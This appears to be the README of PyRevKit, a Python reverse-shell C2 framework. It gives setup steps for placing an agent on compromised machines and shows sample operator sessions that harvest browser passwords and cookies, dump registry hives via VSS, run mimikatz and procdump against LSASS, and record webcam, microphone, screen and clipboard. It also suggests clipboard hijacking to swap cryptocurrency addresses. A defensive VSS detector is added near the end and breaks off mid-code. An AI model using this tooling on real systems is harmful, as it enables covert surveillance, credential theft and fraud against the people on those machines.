A Python-coded, feature-rich reverse shell C2 framework with encrypted WebSocket communication, comprehensive reconnaissance capabilities, advanced credential harvesting, browser data extraction with decryption, bidirectional file transfer, and desktop surveillance with screenshots and webcam/audio capture.
- Secure Communication: TLS/SSL encrypted WebSocket connections
- Authentication: PBKDF2-SHA256 hashed credentials with salting
- File Transfer: Bidirectional file upload/download with base64 encoding
- Auto-Reconnection: Exponential backoff retry mechanism
- Persistent Targets: Targets remain connected between operator sessions
- Multi-Session: Multiple operators can connect to the same target sequentially
- Numbered Target Selection: Visual list of connected targets with quick number-based selection
- Safe Execution: Command timeout protection (30s default)
- File Search: Search files by name pattern with customizable limits
- Content Search: Search inside text files for sensitive data
- System Information: System profiling with 10+ categories: uptime, admin status, all users, groups, listening ports, security software (AV/Firewall/UAC), processes, installed software, domain info, VM detection, scheduled tasks
- Clipboard Access: Read and write clipboard content on target machines
- Credential Harvesting: Extract WiFi passwords, enumerate browser credentials, harvest application credentials (FileZilla, PuTTY, WinSCP), Windows SAM/LSASS guidance
- Browser Password Decryption: Edge/Chrome v10/v11 with v20 detection
- Registry Dump via VSS: SAM/SYSTEM/SECURITY hives for offline hash extraction
- WiFi Credentials: Saved wireless network passwords
- Windows Mail Export via VSS: Complete email database extraction
- Application Credentials: FileZilla, PuTTY, WinSCP enumeration
- History, Cookies, Bookmarks, Downloads: Extract from Chrome, Edge, Firefox
- Automatic Cookie Decryption: v10/v11/DPAPI decryption (seamless integration)
- VSS Integration: Bypasses locked databases when browser is running
- Smart Fallback: Direct copy → VSS fallback → automatic cleanup
- Pattern-Based Exfiltration: Documents, credentials, source code, custom patterns
- VSS File Access: Access locked files via shadow copies
- Directory Listing: Recursive file system exploration
- File Search: Name and content-based searching
- Screenshot Capture: Full-resolution desktop screenshots
- Live Desktop Streaming: Real-time monitoring at ~5 FPS with concurrent command execution
- Webcam Capture: Target webcam photo capture
- Audio Recording: Microphone recording (1-300 seconds)
- Automatic Storage: All media saved in the `loot/` directory
- Installation
- Quick Start
- Architecture
- Usage (Commands)
- Configuration
- Troubleshooting
- System Information Issues
- Platform Specific Notes
- Legal Disclaimer
- License
## Installation

PyRevKit has three components with different dependencies.

Required on the machine running `pyrev_server.py`:
- Python 3.7+
- `websockets` library
- SSL certificate (`server.pem`)
```bash
# Put pyrev_server.py on the C2 and install websockets
wget 'https://raw.githubusercontent.com/infosecm/PyRevKit/refs/heads/main/pyrev_server.py'
pip install websockets
# Generate SSL certificate
openssl req -x509 -newkey rsa:4096 -nodes -out server.pem -keyout server.pem -days 365
```
No optional dependencies needed: the server just relays commands.
Required on the operator's machine running `pyrev_client.py`:
- Python 3.7+
- `websockets` library
```bash
# You may clone the repository, although only pyrev_client.py is needed. You must also install websockets.
git clone https://github.com/yourusername/pyrevkit.git
pip install websockets
```
No optional dependencies needed: the client just sends commands.
Required on ALL target machines running `pyrev_target.py`:

Core (Required):
- Python 3.7+
- `websockets` library
```bash
# Copy only pyrev_target.py to the compromised machine and install websockets.
wget 'https://raw.githubusercontent.com/infosecm/PyRevKit/refs/heads/main/pyrev_target.py'
pip install websockets
```
Optional (only if using these features):
| Feature | Dependencies | When Needed |
|---|---|---|
| Cookies & password decryption | pycryptodome, pywin32 | If using `creds edge_decrypt`, `creds chrome_decrypt`, `browser cookies`, `browser cookies --save` commands; Windows only; v10/v11 support only |
| Screenshots & desktop streaming | mss, pillow | If using `screenshot` or `stream_start` command. mss required on Linux, optional on Windows/macOS (fallback to PIL.ImageGrab) |
| Webcam Capture | opencv-python | If using `webcam` command |
| Audio Recording | sounddevice, scipy, numpy | If using `record` command |
| Clipboard Access | pyperclip | If using `clipboard`, `clipboard monitor`, `clipboard set` commands |
| | + Linux: xclip or wl-clipboard | On Linux targets |
```bash
# Browser cookie/password decryption (v10/v11)
pip install pycryptodome pywin32
# Screenshots & desktop streaming
pip install mss pillow
# For media capture (webcam + audio)
pip install opencv-python sounddevice scipy numpy
# For clipboard features
pip install pyperclip
# Linux clipboard support
sudo apt-get install xclip          # For X11
# or
sudo apt-get install wl-clipboard   # For Wayland
```
Key Points:
- VSS features require Administrator privileges on the target
- v20 cookie decryption is not supported (documented below)
- Most features work with just `websockets` installed
## Quick Start

```bash
# Add operator credentials on C2 server
python pyrev_server.py -creds operator admin SecurePassword123!
# Add target credentials on C2 server
python pyrev_server.py -creds target machineA TargetPassword456!
```
Credentials are stored in `credentials.json` with PBKDF2-SHA256 hashing:
```json
{
  "operator": {
    "admin": {
      "hash": "0b2ad92a1f3e68487a780b3c6d7ab33c...",
      "salt": "e48cbd452e38b9337130dcb82f3b761c..."
    }
  },
  "target": {
    "machineA": {
      "hash": "f61a20f536c15913156a282b3eb84b03...",
      "salt": "ff789cd49679ebadd2f60b02094ae21b..."
    }
  }
}
```
```
python pyrev_server.py [OPTIONS]
```
Options:
- `-creds ROLE LOGIN PASSWORD` - Add/update credentials
- `-host HOST` - Server host (default: 0.0.0.0)
- `-port PORT` - Server port (default: 8765)
- `-cert FILE` - SSL certificate file (default: server.pem)
```bash
# Usage example
python pyrev_server.py -host 192.0.2.1 -port 8765 -cert server.pem
```
Output example:
```
[+] Directories ready: loot/, payloads/
[+] Server running on wss://192.0.2.1:8765
[+] Credentials file: credentials.json
[+] Loot directory: loot/
[+] Payloads directory: payloads/
```
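The credential store shown above keeps one PBKDF2-SHA256 hash and one salt per login. As an added example, not code from PyRevKit, here is how such a store can be built and checked on the server side: hashes are derived with `hashlib.pbkdf2_hmac`, compared in constant time with `hmac.compare_digest`, and an unknown login still pays for a full derivation so response time does not reveal which logins exist. The iteration count, the salt length, the helper names and the sample store are assumptions for this example; the page does not state the project's own values.

```python
import hashlib
import hmac
import json
import os
from typing import Dict, Optional

# Assumed parameters for this example (the page does not give PyRevKit's own values).
PBKDF2_ITERATIONS = 600_000   # order of magnitude currently recommended for PBKDF2-HMAC-SHA256
SALT_BYTES = 16


def derive(password: str, salt: bytes) -> bytes:
    """PBKDF2-HMAC-SHA256 of the password under the given salt."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)


def make_record(password: str, salt: Optional[bytes] = None) -> Dict[str, str]:
    """Build one {"hash": ..., "salt": ...} entry in the credentials.json layout."""
    salt = os.urandom(SALT_BYTES) if salt is None else salt
    return {"hash": derive(password, salt).hex(), "salt": salt.hex()}


def verify(store: Dict[str, Dict[str, Dict[str, str]]], role: str, login: str, password: str) -> bool:
    """Check a login attempt for a role ("operator" or "target") against the store."""
    record = store.get(role, {}).get(login)
    if record is None:
        # Unknown login: still pay the derivation cost so the response time
        # does not distinguish "no such login" from "wrong password".
        derive(password, b"\x00" * SALT_BYTES)
        return False
    candidate = derive(password, bytes.fromhex(record["salt"]))
    # Constant-time comparison of the stored and freshly derived digests.
    return hmac.compare_digest(candidate, bytes.fromhex(record["hash"]))


def serialize(store: Dict[str, Dict[str, Dict[str, str]]]) -> str:
    """Serialize the store in the same shape as credentials.json."""
    return json.dumps(store, indent=2)


def load(text: str) -> Dict[str, Dict[str, Dict[str, str]]]:
    """Parse a credentials.json-shaped document back into a store."""
    return json.loads(text)


def build_sample_store() -> Dict[str, Dict[str, Dict[str, str]]]:
    """Constructed store holding the two logins used in the Quick Start."""
    return {
        "operator": {"admin": make_record("SecurePassword123!")},
        "target": {"machineA": make_record("TargetPassword456!")},
    }


if __name__ == "__main__":
    store = build_sample_store()
    print(serialize(store))
    print("operator admin ok:", verify(store, "operator", "admin", "SecurePassword123!"))
    print("wrong password ok:", verify(store, "operator", "admin", "wrong"))
```

Two details matter when reviewing a store like this: the salt must be fresh per record (two records for the same password must not share a hash), and the comparison must not short-circuit on the first differing byte, which is what `compare_digest` guarantees.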
```
python pyrev_target.py
```
Edit the configuration section in `pyrev_target.py`:
```python
# ========== CONFIGURATION ==========
TARGET_ID = "machineA"
SERVER_HOST = "192.0.2.1"
SERVER_PORT = 8765
AUTO_LOGIN = "machineA"          # Fill for auto-connect
AUTO_PASSWORD = "TargetPass456"  # Fill for auto-connect
# ====================================
```
Then simply run:
```bash
python pyrev_target.py
```
Output:
```
[+] Auto-connecting to 192.0.2.1:8765 as machineA
[+] Connected and authenticated. Waiting for commands...
```
Not providing values for `AUTO_LOGIN` and `AUTO_PASSWORD` makes `pyrev_target.py` run in interactive mode:
```
Server host [192.0.2.1]:
Server port [8765]:
--- Authentication ---
Login: machineA
Password: [hidden]
[SERVER] Authentication successful. Waiting for commands...
[+] Target agent ready. Waiting for commands...
```
```
python pyrev_client.py
```
New interactive target selection:
```
Server host [192.0.2.1]:
Server port [8765]:
--- Authentication ---
Login: admin
Password: [hidden]
[+] Connected to server
[+] Authentication successful
============================================================
CONNECTED TARGETS
============================================================
  [1] machineA
  [2] machineB
  [3] prod-web-01
============================================================
Select target [number or name]: 1
[*] Connecting to target: machineA
[SERVER] Connected to target 'machineA'
============================================================
✓ Interactive session started
Type 'help' for available commands
Type 'exit' to quit
============================================================
>>> whoami
victim-pc
>>>
```
## Architecture

```
┌─────────────────┐         ┌─────────────────┐         ┌─────────────────┐
│    Operator     │         │    C2 Server    │         │     Target      │
│                 │◄───────►│  - Auth         │◄───────►│                 │
│                 │   WSS   │  - Relay        │   WSS   │                 │
│  pyrev_client   │         │  - Files        │         │  pyrev_target   │
└─────────────────┘         │                 │         └────────┬────────┘
                            │  pyrev_server   │                  │
                            └────────┬────────┘              downloads/
                                     │
                            ┌────────┴────────┐
                            │                 │
                          loot/           payloads/
```
## Usage (Commands)

```
>>> download /etc/passwd
[*] Requesting download: /etc/passwd
[✓] Downloaded passwd (2.45 KB) → loot/machineA_passwd
```
Files are downloaded from the target to the C2 server's `loot/` folder.
Features:
- Automatic renaming with target prefix
- Size display
- Max file size: 50MB
- Supports absolute and relative paths
```
>>> upload exploit.sh
[*] Uploading: exploit.sh
[✓] Saved exploit.sh (5.67 KB) → downloads/exploit.sh
```
Files are uploaded from the server's `payloads/` directory to the target's `downloads/` folder.
```
# List downloaded files in the C2 server's loot/ folder
>>> ls_loot
Files in loot/:
  - machineA_passwd (2.45 KB)
  - machineA_audio_20260407_003625.wav (5168.01 KB)

# List available files in the C2 server's payloads/ folder
>>> ls_payloads
Files in payloads/:
  - exploit.sh (5.67 KB)
  - payload.exe (234.56 KB)

# List available files in the target's downloads/ folder
>>> ls_downloads
[*] Listing downloads directory...
Files in downloads/ directory:
  - screenshot_20260407_003520.png (452.85 KB)
💡 Download with: download screenshot_20260407_003520.png
```
Capture photos from the target's webcam:
```
>>> webcam
[*] Capturing webcam...
[✓] Webcam captured (156.78 KB) → loot/machineA_webcam_20260403_143022.jpg
```
Features:
- JPEG format
- Native webcam resolution
- Automatic timestamped naming
- Saved to the `loot/` directory

Requirements:
- Target must have `opencv-python` installed: `pip install opencv-python`
- Webcam must be accessible (not used by another application)
Record audio from the target's microphone:
```
>>> record 30
[*] Recording 30 seconds of audio...
[✓] Audio recorded (5.05 MB) → loot/machineA_audio_20260403_143522.wav
```
Parameters:
- Duration: 1 to 300 seconds (5 minutes max)
- Format: WAV, 44.1kHz, 16-bit, stereo
- Approximate size: ~170 KB per second

Examples:
```
>>> record 10     # 10 seconds (~1.7 MB)
>>> record 60     # 1 minute (~10 MB)
>>> record 300    # 5 minutes (max, ~50 MB)
```
Requirements:
- Target must have the audio libraries installed: `pip install sounddevice scipy numpy`
Takes a screenshot of the target's display:
```
>>> screenshot
[*] Capturing screenshot...
[✓] Screenshot captured (452.85 KB) → loot\machineA_screenshot_20260407_003520.png
```
Requirements:
- Target must have the `mss` library installed: `pip install mss`

Streams a continuous flow of screenshots at ~5 FPS; other commands can be run concurrently.
```
>>> stream_start
[*] Starting desktop stream...
[*] Desktop stream started from machineA
[*] Stream frames will be saved in loot/ directory
[*] You can continue using commands while streaming
[*] Use 'stream_stop' to end the stream
>>> stream_stop
[*] Stopping desktop stream...
[*] Desktop stream stopped
```
Requirements:
- Target must have the `mss` library installed: `pip install mss`

Search for files by name pattern:
```
>>> search *.pdf
[*] Searching for files: *.pdf
[✓] Found 15 results:
1. C:\Users\John\Documents\report.pdf (523.45 KB)
2. C:\Users\John\Desktop\invoice.pdf (102.34 KB)
...
```
With custom limit:
```
>>> search *.pem --limit 20
[*] Searching for files: *.pem (limit: 20)
[✓] Found 20 results:
1. /home/user/cert1.pem (5.61 KB)
...
20. /home/user/cert20.pem (3.24 KB)
```
Supported patterns:
- `*.pdf` - All PDF files
- `*.docx` - All Word documents
- `password*` - Files starting with "password"
- `*config*` - Files containing "config"
- `secret.txt` - Specific file

Default limit: 100 results (use `--limit N` to customize)
Search inside text files for sensitive data:
```
>>> search --content "password"
[*] Searching for content: password
[✓] Found 8 results:
1. C:\config.txt:45
   database_password=admin123
2. C:\Users\John\notes.txt:12
   Remember to change password next week
...
```
With custom limit:
```
>>> search --content "api_key" --limit 15
[*] Searching for content: api_key (limit: 15)
[✓] Found 45 results:
1. /app1/config.json:23
   "api_key": "sk_live_abc123..."
...
15. /app12/config.json:43
   "api_key": "s8jdggkdvt..."
```
Supported file types:
- Text files: `.txt`, `.log`, `.conf`, `.config`, `.ini`
- Code files: `.py`, `.sh`, `.bat`, `.cmd`
- Data files: `.xml`, `.json`
Limitations:
- Max file size: 10MB per file
- Text files only (binary files skipped)
Gather comprehensive system information for reconnaissance and profiling:
```
>>> sysinfo
[*] Gathering system information...
[✓] System Information - prod-web-01
═══ SYSTEM ═══
Os: Windows
Os Version: 10.0.19045
Os Release: 10
Hostname: PROD-WEB-01
Architecture: AMD64
Processor: Intel Core i7-9700K @ 3.60GHz
Python Version: 3.11.0
Platform: Windows-10-10.0.19045-SP0
Uptime: 15d 3h 42m
Uptime Seconds: 1317720
═══ CURRENT USER ═══
Username: jdoe
Home: C:\Users\jdoe
Administrator/Root: YES
Groups: Administrators, Remote Desktop Users
═══ ALL USERS ═══
Total: 8
1. Administrator
2. jdoe
3. sql_service
4. backup_admin
5. Guest
...
═══ NETWORK ═══
Hostname: PROD-WEB-01
Local Ip: 192.168.1.100
Listening Ports (12 total):
  - 0.0.0.0:135
  - 0.0.0.0:445
  - 0.0.0.0:3389
  - 0.0.0.0:5357
  ...
Listening Count: 12
═══ SECURITY ═══
Antivirus: Windows Defender (Enabled)
Firewall: Enabled
Uac: Enabled
═══ PROCESSES ═══
Total Running: 156
Security-Related Processes:
  - MsMpEng.exe (Windows Defender)
  - SecurityHealthService.exe
═══ INSTALLED SOFTWARE ═══
Detected Applications:
  - Google Chrome
  - Microsoft Office
  - Python
  - Java
═══ STORAGE ═══
C:: 120.5GB free / 512.0GB total
D:: 450.2GB free / 1024.0GB total
═══ DOMAIN INFO ═══
Name: CORP.LOCAL
Is Joined: True
═══ VIRTUALIZATION ═══
VM Detected: YES (vmware)
═══ SCHEDULED TASKS ═══
User Tasks: 3
  - \BackupScript
  - \DatabaseMaintenance
```
Comprehensive information collected:
System Details:
- Operating system and version
- Hardware specifications (CPU, architecture)
- System uptime (days, hours, minutes)
- Platform information
- Python version
User Information:
- Current username and home directory
- Administrator/Root privileges (critical for privilege escalation assessment)
- Group memberships (Administrators, sudo, wheel, etc.)
- Complete list of all local users (identify service accounts, admin accounts)
Network Configuration:
- Hostname and local IP address
- Listening ports (exposed services: RDP, SMB, SSH, etc.)
- Active network interfaces
- Port count for attack surface assessment
Security Posture:
- Antivirus status (Windows Defender, etc.)
- Firewall status (enabled/disabled on all profiles)
- UAC level (Windows User Account Control)
- SELinux status (Linux - Enforcing/Permissive/Disabled)
Processes & Services:
- Total running processes
- Security-related processes (AV, EDR, security tools)
- Detection of: Defender, CrowdStrike, SentinelOne, McAfee, etc.
Installed Software:
- Common applications detected (Chrome, Office, Python, Java, etc.)
- Package manager information (Linux)
- Package count
Storage:
- All drives/mounts with free and total space
- Disk usage analysis
Domain Information (Windows):
- Domain name
- Domain-joined status (vs Workgroup)
- Useful for Active Directory enumeration
Scheduled Tasks:
- User-created scheduled tasks (Windows)
- Crontab entries (Linux/macOS)
- Persistence opportunity identification
Virtualization:
- VM detection (VMware, VirtualBox, Hyper-V, KVM, Xen)
- Physical vs virtual machine identification
Environment Variables:
- Important system paths
- Development environment indicators
Platform Support:
- Windows: Full feature set (all categories)
- Linux: Full feature set (except Domain and UAC, as expected)
- macOS: Full feature set (except Domain and UAC, as expected)
No additional dependencies required - uses Python standard library only.
Perfect for:
- Initial reconnaissance
- Privilege escalation planning
- Attack surface mapping
- Security posture assessment
- Finding service accounts and admin users
- Identifying persistence opportunities
Capture clipboard content from the target:
```
>>> clipboard
[*] Reading clipboard...
[✓] Clipboard content:
MySecretPassword123!
```
Use cases:
- Capture copied passwords
- Intercept copied credentials
- Monitor user activity
- Capture API keys and tokens
Inject content into the target's clipboard:
```
>>> clipboard set "Hello from operator"
[*] Setting clipboard...
[✓] Clipboard updated
```
Use cases:
- Replace cryptocurrency addresses
- Inject phishing URLs
- Modify copied commands
- Social engineering attacks
Continuously monitor clipboard changes in real-time with timestamps. Target stores captures in memory, client polls on demand.
Start Monitoring:
```
>>> clipboard monitor 300
[*] Monitoring clipboard for 300 seconds...
[*] Target monitors in background
[*] Use 'clipboard check' to see new captures
[+] Monitoring clipboard... (duration: 300s)
>>>
```
Check for New Captures:
```
>>> clipboard check
[2026-04-04 23:56:05] Copied: password123
[2026-04-04 23:56:18] Copied: admin@company.com
[2026-04-04 23:56:35] Copied: secret_key_xyz
>>>
# Check again later
>>> clipboard check
[2026-04-04 23:57:12] Copied: api_token_abc
>>>
# No new captures
>>> clipboard check
[*] No new clipboard captures
>>>
```
Note: Shows only NEW captures since the last check; the index is maintained automatically.
- Flexible - Check captures as often or rarely as you want
- Auto-stop - Automatically stops after specified duration
Requirements:
- Target must have `pyperclip` installed: `pip install pyperclip`
- Graphical environment required (not headless servers)
- Linux: Requires `xclip` or `xsel`: `sudo apt-get install xclip`

Extract and enumerate credentials from various sources on the target machine.
```
>>> creds wifi
[*] Harvesting wifi credentials...
[✓] Credential Harvesting - WIFI
WiFi Networks (5 found):
  SSID: HomeNetwork
  Password: MySecurePassword123
  SSID: Office_WiFi
  Password: Company2024!
  SSID: Guest_Network
  Password: [No password or encrypted]
```
What it extracts:
- Windows: Uses `netsh wlan` to extract saved WiFi passwords (up to 20 profiles)
- Linux: Reads NetworkManager configuration files from `/etc/NetworkManager/system-connections/`
```
>>> creds browsers
[*] Harvesting browsers credentials...
[✓] Credential Harvesting - BROWSERS
CHROME:
  Found: Yes
  Count: 45
  Location: C:\Users\jdoe\AppData\Local\Google\Chrome\User Data\Default\Login Data
FIREFOX:
  Found: Yes
  Count: 23
  Location: C:\Users\jdoe\AppData\Roaming\Mozilla\Firefox\Profiles\abc.default
EDGE:
  Found: Yes
  Count: 12
  Location: C:\Users\jdoe\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Note: Actual password decryption requires additional tools
```
What it enumerates:
- Google Chrome - Counts stored credentials and shows database location
- Mozilla Firefox - Enumerates logins from profiles
- Microsoft Edge - Windows only, shows credential count
Note: This command counts credentials but does NOT decrypt passwords. Download the database files and use offline 3rd party tools like LaZagne, SharpChrome, or firefox_decrypt.py for actual password extraction, or you can try extracting passwords with the following commands:
```
>>> creds edge_decrypt
[*] Harvesting edge_decrypt credentials...
[✓] Credential Harvesting - EDGE_DECRYPT
Browser: Edge
Total Credentials: 9
Decrypted (v10/v11): 2
App-Bound (v20): 7
⚠️ Edge uses App-Bound Encryption (v20) for newer passwords
═══ DECRYPTED PASSWORDS (v10/v11) ═══
URL: https://github.com
  Username: john.doe@company.com
  Password: GitHubPass2024!
  Version: v10
URL: https://outlook.office365.com
  Username: jdoe@corp.local
  Password: C0rpMail#2023
  Version: v11
═══ APP-BOUND ENCRYPTED (v20) ═══
7 password(s) could not be decrypted (App-Bound Encryption)
[v20 App-Bound - Export Required]
💡 To export v20 passwords:
  1. Open Edge
  2. Go to: edge://settings/passwords
  3. Click ⋯ (three dots) next to "Saved passwords"
  4. Click "Export passwords"
  5. Save as CSV file
```
```
>>> creds chrome_decrypt
[*] Harvesting chrome_decrypt credentials...
[✓] Credential Harvesting - CHROME_DECRYPT
Browser: Chrome
Total Credentials: 3
Decrypted (v10/v11): 3
App-Bound (v20): 0
═══ DECRYPTED PASSWORDS (v10/v11) ═══
URL: https://github.com
  Username: jdoe
  Password: gh_p4ssw0rd!42
  Version: v10
URL: https://mail.google.com
  Username: john.doe@gmail.com
  Password: Gm4ilP@ss2024
  Version: v10
URL: https://gitlab.corp.local
  Username: jdoe
  Password: G!tl4bR00t#99
  Version: v11
```
- If running v10/v11, Edge passwords will be decrypted.
- We do not provide support for v20 Edge password decryption.
```
# Dump SAM/SYSTEM/SECURITY hives via VSS
>>> creds registry_dump_vss
[*] Harvesting registry_dump_vss credentials...
[✓] Credential Harvesting - REGISTRY_DUMP_VSS
╔════════════════════════════════════════════════════╗
║           REGISTRY HIVES DUMPED VIA VSS            ║
╚════════════════════════════════════════════════════╝
Method: Volume Shadow Copy (VSS)
Hives Dumped: SAM, SYSTEM, SECURITY
Total Hives: 3/3
Filename: registry_dump_20260412_232852.zip
Location: downloads\registry_dump_20260412_232852.zip
Original Size: 21.94 MB
ZIP Size: 4.18 MB
Compression: 80.9%
💡 Download with:
>>> download registry_dump_20260412_232852.zip
Extract credentials with:
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
Or use Impacket:
python3 secretsdump.py -sam SAM -system SYSTEM LOCAL
```
VSS Registry Dump Workflow:
- Creates a VSS snapshot of the system drive
- Copies the registry hives from the shadow copy:
  - `C:\Windows\System32\config\SAM`
  - `C:\Windows\System32\config\SYSTEM`
  - `C:\Windows\System32\config\SECURITY`
- Creates a ZIP archive
- Automatic cleanup
Other harvesting methods:
```
# 2. If admin, upload dumping tool
>>> upload mimikatz.exe
# 3. Execute manually
>>> mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
# Or use ProcDump
>>> upload procdump64.exe
>>> procdump64.exe -accepteula -ma lsass.exe lsass.dmp
>>> download lsass.dmp
```
```
>>> creds applications
[*] Harvesting applications credentials...
[✓] Credential Harvesting - APPLICATIONS
FILEZILLA:
  Found: Yes
  - file: recentservers.xml
    note: Contains FTP credentials (plaintext in XML)
  - file: sitemanager.xml
    note: Contains FTP credentials (plaintext in XML)
PUTTY:
  Found: Yes
  Sessions: prod-server, dev-db, backup-host
  Note: Session names found in registry (passwords not stored by PuTTY)
WINSCP:
  Found: Yes
  Location: C:\Users\jdoe\AppData\Roaming\WinSCP.ini
  Note: Contains encrypted passwords (can be decrypted with tools)
```
What it finds:
- FileZilla - FTP credentials stored in plaintext XML (passwords are base64 encoded)
- PuTTY - SSH session names from Windows Registry (no passwords stored)
- WinSCP - Encrypted passwords in config file (can be decrypted with tools)
```
# Show first 50 history entries
>>> browser history
[*] Extracting browser history...
[✓] Browser HISTORY - First 50 Entries
═══ CHROME (21 entries) ═══
[1] https://github.com/corp/internal-api
    Title: corp/internal-api: Internal REST API · GitHub
    Visits: 14 | Last: 2026-04-13 09:14:22
[2] https://mail.google.com/mail/u/0/
    Title: Inbox - john.doe@gmail.com
    Visits: 87 | Last: 2026-04-13 08:55:01
[...]
═══ EDGE (18 entries) ═══
[1] https://outlook.office365.com/mail/inbox
    Title: Mail - John Doe - Outlook
    Visits: 61 | Last: 2026-04-13 09:02:14
[2] https://corp.sharepoint.com/sites/IT/Documents/Forms/AllItems.aspx
    Title: Documents - IT - SharePoint
    Visits: 9 | Last: 2026-04-13 08:44:58
[...]
═══ FIREFOX (11 entries) ═══
[1] https://stackoverflow.com/questions/74821966
    Title: python - asyncio websocket connection drops after idle - Stack Overflow
    Visits: 3 | Last: 2026-04-13 07:30:19
[2] https://docs.python.org/3/library/asyncio-task.html
    Title: Coroutines and Tasks — Python 3.12 documentation
    Visits: 8 | Last: 2026-04-12 21:14:55
[...]
────────────────────────────────────────────────────
Total shown: 50 entries across 3 browsers
💡 Export all entries with: browser history --save
```
```
# Save all history to file → downloads/browser_history_TIMESTAMP.txt
>>> browser history --save
[*] Extracting browser history and saving to file...
[✓] Browser HISTORY - Complete Data Saved to File
╔═════════════════════════════════════════════════════════╗
║                 FILE SAVED SUCCESSFULLY                 ║
╚═════════════════════════════════════════════════════════╝
Filename: browser_history_20260413_000731.txt
Location: downloads\browser_history_20260413_000731.txt
Size: 1639.17 KB
Total Entries: 4638
💡 Download this file with:
>>> download downloads\browser_history_20260413_000731.txt
```
- No limit: saves everything
```
# Show first 50 cookies with decryption attempt
>>> browser cookies
[*] Extracting browser cookies...
[✓] Browser COOKIES - First 50 Entries (decryption enabled)
═══ CHROME (23 entries) ═══
[1] Host: .github.com
    Name: user_session
    Value: abc12XqT9mNp3vKwRsLu7fY...
    Decrypted: Yes (v10)
    Expires: 1776643200
[2] Host: .google.com
    Name: SID
    Value: g.a000pQrKtY8mZxL3bNc...
    Decrypted: Yes (v10)
    Expires: 1807747200
[...]
═══ EDGE (19 entries) ═══
[1] Host: .office365.com
    Name: ESTSAUTH
    Value: [v20 App-Bound]
    Expires: 1776643200
[2] Host: .sharepoint.com
    Name: FedAuth
    Value: 77u/PD94bWwgdmVyc2...
    Decrypted: Yes (v10)
    Expires: 1776729600
[...]
═══ FIREFOX (8 entries) ═══
[1] Host: .stackoverflow.com
    Name: prov
    Value: 4a3b2c1d-e5f6-7890-ab...
    Expires: 1902355200
[2] Host: 10.0.0.5
    Name: session_id
    Value: 8f3d1a9c2e74b056...
    Expires: 0
[...]
────────────────────────────────────────────────────
Total shown: 50 entries across 3 browsers
✓ v10/v11 cookies automatically decrypted
✗ v20 App-Bound cookies cannot be decrypted
💡 Export all cookies with: browser cookies --save
```
```
# Save all cookies with decryption → downloads/browser_cookies_TIMESTAMP.txt
>>> browser cookies --save
[*] Extracting browser cookies and saving to file...
[✓] Browser COOKIES - Complete Data Saved to File
╔═════════════════════════════════════════════════════════╗
║                 FILE SAVED SUCCESSFULLY                 ║
╚═════════════════════════════════════════════════════════╝
Filename: browser_cookies_20260413_000958.txt
Location: downloads\browser_cookies_20260413_000958.txt
Size: 264.73 KB
Total Entries: 2858
💡 Download this file with:
>>> download downloads\browser_cookies_20260413_000958.txt
```
- No limit: saves everything
- Automatic decryption integrated
- Uses VSS if the database is locked
- v20 unsupported; shown as [v20 App-Bound]
Encryption Version Support

| Version | Encryption Method | Decryption Support | Status |
|---|---|---|---|
| v10 | AES-256-GCM | ✅ Full Support | Uses master key from Local State |
| v11 | AES-256-GCM | ✅ Full Support | Same as v10 |
| v20 | App-Bound Encryption | ❌ Cannot Decrypt | Service-managed, hardware-backed |
| DPAPI | Windows DPAPI | ✅ Full Support | Legacy encryption |
| Plaintext | None | ✅ Direct Read | Some cookies stored unencrypted |
Benefits:
- Bypasses file locks (works with apps running)
- Looks like a legitimate backup operation
- No direct process interaction needed

Detection considerations:
- VSS operations are logged in the Windows Event Log (Event IDs 8222, 8224)
- EDR/AV may monitor VSS API calls
- SIEM may alert on unusual VSS patterns
- Requires Admin privileges (elevation may be logged)
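The event-log point above is where a defender gets traction: each VSS snapshot leaves Event ID 8222 in the Application log, so a shadow copy requested by anything other than the host's backup software, or several requested within a short window (the registry dump, mail export and locked-cookie paths each take one), is worth an alert. The detector below is an added example written for this page, not part of PyRevKit or of any SIEM product. It reads a constructed tab-separated export (time, host, event ID, requesting process, user); the process and user columns, the backup allowlist and the ten-minute burst window are assumptions, and a real pipeline would take the requesting process from its own process-creation or EDR telemetry rather than from the VSS record itself.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Event IDs the page lists for VSS activity in the Windows Application log.
VSS_SHADOW_CREATED = 8222
VSS_IDLE_SHUTDOWN = 8224

# Assumed allowlist of processes expected to request shadow copies on this host.
BACKUP_ALLOWLIST = {"wbengine.exe", "backupagent.exe"}
# Interpreters and script hosts that have no business driving VSS directly.
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "powershell.exe", "cmd.exe", "wscript.exe"}
BURST_WINDOW = timedelta(minutes=10)   # assumed correlation window
BURST_COUNT = 2                        # creations within the window that count as a burst


@dataclass
class VssEvent:
    time: datetime
    host: str
    event_id: int
    process: str   # requesting process image (constructed column for this example)
    user: str


def parse_line(line: str) -> VssEvent:
    """Parse one constructed tab-separated export line: time, host, event id, process, user."""
    t, host, eid, proc, user = line.rstrip("\n").split("\t")
    return VssEvent(datetime.fromisoformat(t), host, int(eid), proc.lower(), user)


def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Return one alert per shadow-copy creation not attributable to backup software."""
    events = sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e.time)
    recent: Dict[Tuple[str, str], List[datetime]] = {}
    alerts: List[Dict[str, str]] = []
    for e in events:
        if e.event_id != VSS_SHADOW_CREATED or e.process in BACKUP_ALLOWLIST:
            continue   # 8224 idle shutdowns and allowlisted backups are noise here
        key = (e.host, e.process)
        # Keep only earlier creations by the same host/process inside the window.
        window = [t for t in recent.get(key, []) if e.time - t <= BURST_WINDOW]
        window.append(e.time)
        recent[key] = window
        reason = ("shadow copy requested by script host" if e.process in SCRIPT_HOSTS
                  else "shadow copy requested by non-allowlisted process")
        if len(window) >= BURST_COUNT:
            reason += f"; {len(window)} creations within {BURST_WINDOW}"
        alerts.append({"host": e.host, "time": e.time.isoformat(), "process": e.process,
                       "user": e.user, "reason": reason})
    return alerts


# Constructed sample export: a nightly backup, then VSS use from a Python process
# at the times shown in the page's registry dump and mail export examples.
SAMPLE_LOG = [
    "2026-04-12T02:00:05\tPROD-WEB-01\t8222\twbengine.exe\tNT AUTHORITY\\SYSTEM",
    "2026-04-12T02:10:11\tPROD-WEB-01\t8224\tvssvc.exe\tNT AUTHORITY\\SYSTEM",
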